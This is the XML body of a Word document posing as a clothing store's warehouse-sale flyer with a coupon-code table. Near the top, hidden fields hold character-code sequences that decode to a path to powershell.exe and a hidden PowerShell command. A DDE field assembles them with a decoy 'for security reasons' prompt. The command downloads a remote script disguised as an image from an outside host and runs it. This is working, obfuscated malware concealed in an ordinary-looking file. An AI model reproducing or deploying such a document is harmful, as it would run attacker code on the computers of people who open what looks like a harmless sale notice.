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dy>
      <w:p w:rsidR="00830AD6" w:rsidRDefault="00830AD6" w:rsidP="00830AD6">
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> </w:instrText>
        </w:r>
        <w:r>
          <w:instrText>SET c</w:instrText>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> </w:instrText>
        </w:r>
        <w:r>
          <w:instrText>"</w:instrText>
        </w:r>
        <w:fldSimple w:instr="  QUOTE  67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101  ">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:noProof/>
            </w:rPr>
            <w:instrText> </w:instrText>
          </w:r>
        </w:fldSimple>
        <w:r>
          <w:instrText>"</w:instrText>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
      <w:p w:rsidR="00830AD6" w:rsidRDefault="00830AD6" w:rsidP="00830AD6">
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> </w:instrText>
        </w:r>
        <w:r>
          <w:instrText>SET d</w:instrText>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> "</w:instrText>
        </w:r>
        <w:fldSimple w:instr="  QUOTE  45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 45 99 32 105 101 120 40 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 100 97 105 108 121 99 97 114 101 52 117 46 99 111 46 117 107 47 97 115 115 101 116 115 47 105 109 103 47 98 97 99 107 103 114 111 117 110 100 46 106 112 103 39 41 41  ">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:noProof/>
            </w:rPr>
            <w:instrText> </w:instrText>
          </w:r>
        </w:fldSimple>
        <w:r>
          <w:instrText xml:space="preserve">" </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
      <w:p w:rsidR="00830AD6" w:rsidRDefault="00830AD6" w:rsidP="00830AD6">
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> </w:instrText>
        </w:r>
        <w:r>
          <w:instrText>SET e</w:instrText>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> "</w:instrText>
        </w:r>
        <w:fldSimple w:instr="  QUOTE  102 111 114 32 115 101 99 117 114 105 116 121 32 114 101 97 115 111 110 115  ">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:noProof/>
            </w:rPr>
            <w:instrText> </w:instrText>
          </w:r>
        </w:fldSimple>
        <w:r>
          <w:instrText xml:space="preserve">" </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
        <w:bookmarkStart w:id="0" w:name="_GoBack"/>
        <w:bookmarkEnd w:id="0"/>
      </w:p>
      <w:p w:rsidR="00522B43" w:rsidRDefault="00BF6731">
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> DDE</w:instrText>
        </w:r>
        <w:r w:rsidR="00830AD6">
          <w:instrText xml:space="preserve"> </w:instrText>
        </w:r>
        <w:fldSimple w:instr=" REF c ">
          <w:r w:rsidR="00830AD6">
            <w:rPr>
              <w:b/>
              <w:noProof/>
            </w:rPr>
            <w:instrText> </w:instrText>
          </w:r>
        </w:fldSimple>
        <w:r w:rsidR="00830AD6">
          <w:instrText xml:space="preserve"> </w:instrText>
        </w:r>
        <w:fldSimple w:instr=" REF d ">
          <w:r w:rsidR="00830AD6">
            <w:rPr>
              <w:b/>
              <w:noProof/>
            </w:rPr>
            <w:instrText> </w:instrText>
          </w:r>
        </w:fldSimple>
        <w:r w:rsidR="00830AD6">
          <w:instrText xml:space="preserve"> </w:instrText>
        </w:r>
        <w:fldSimple w:instr=" REF e ">
          <w:r w:rsidR="00830AD6">
            <w:rPr>
              <w:b/>
              <w:noProof/>
            </w:rPr>
            <w:instrText> </w:instrText>
          </w:r>
        </w:fldSimple>
        <w:r>
          <w:instrText xml:space="preserve"> </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
      <w:sectPr w:rsidR="00522B43">
        <w:pgSz w:w="12240" w:h="15840"/>
        <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
        <w:cols w:space="720"/>
        <w:docGrid w:linePitch="360"/>
      </w:sectPr>
    </w:body>
    <w:p w:rsidR="0068301E" w:rsidRDefault="00B822CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3055620" cy="519390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20622"/>
                <wp:lineTo x="21411" y="20622"/>
                <wp:lineTo x="21411"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7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3055620" cy="519390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2123C" w:rsidRDefault="00A2123C" w:rsidP="00A2123C"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="146"/>
        <w:tblW w:w="12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51"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A2123C" w:rsidTr="00992236">
        <w:trPr>
          <w:trHeight w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12251" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="5A668E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A2123C" w:rsidRPr="00A2123C" w:rsidRDefault="00A2123C" w:rsidP="00992236">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A2123C">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Up to 25% off autumn updates. Shop now</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A2123C" w:rsidRPr="00A2123C" w:rsidRDefault="00A2123C" w:rsidP="00A2123C"/>
    <w:p w:rsidR="00C932FB" w:rsidRPr="00A2123C" w:rsidRDefault="00C932FB" w:rsidP="00A2123C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C932FB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>THE WAREHOUSE SALE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C932FB">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>We take sale seriously. That’s why we’ve added even more new styles</w:t>
      </w:r>
      <w:r w:rsidR="00FC770B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and prints, all up to 80% off. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C932FB">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>No kidding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC770B" w:rsidRPr="00C932FB" w:rsidRDefault="00FC770B" w:rsidP="00C932FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B822CF" w:rsidRDefault="00B822CF" w:rsidP="00C932FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00992236" w:rsidRDefault="00992236" w:rsidP="00C932FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00992236" w:rsidRPr="00C932FB" w:rsidRDefault="00992236" w:rsidP="00C932FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="-1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="00A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3116"/>
        <w:gridCol w:w="3117"/>
        <w:gridCol w:w="3117"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C932FB" w:rsidTr="00C932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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRPr="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C932FB">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Coupon</w:t>
            </w:r>
            <w:r w:rsidR="00A2123C">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRPr="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C932FB">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRPr="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C932FB">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C932FB" w:rsidTr="00C932FB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>WDRESS15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRPr="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C932FB">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Dresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C932FB" w:rsidTr="00C932FB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>WHJNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRPr="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C932FB">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Jeans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C932FB" w:rsidTr="00C932FB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00FC770B" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>FREEDOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00FC770B" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRPr="00C932FB" w:rsidRDefault="00FC770B" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Skirts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C932FB" w:rsidTr="00C932FB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00FC770B" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>STYLE777</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00FC770B" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRPr="00C932FB" w:rsidRDefault="00FC770B" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC770B">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>All accessories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C932FB" w:rsidTr="00C932FB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>SALE20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C932FB" w:rsidRPr="00C932FB" w:rsidRDefault="00C932FB" w:rsidP="00C932FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>All</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A2123C" w:rsidRPr="00C932FB" w:rsidRDefault="00992236" w:rsidP="00C932FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
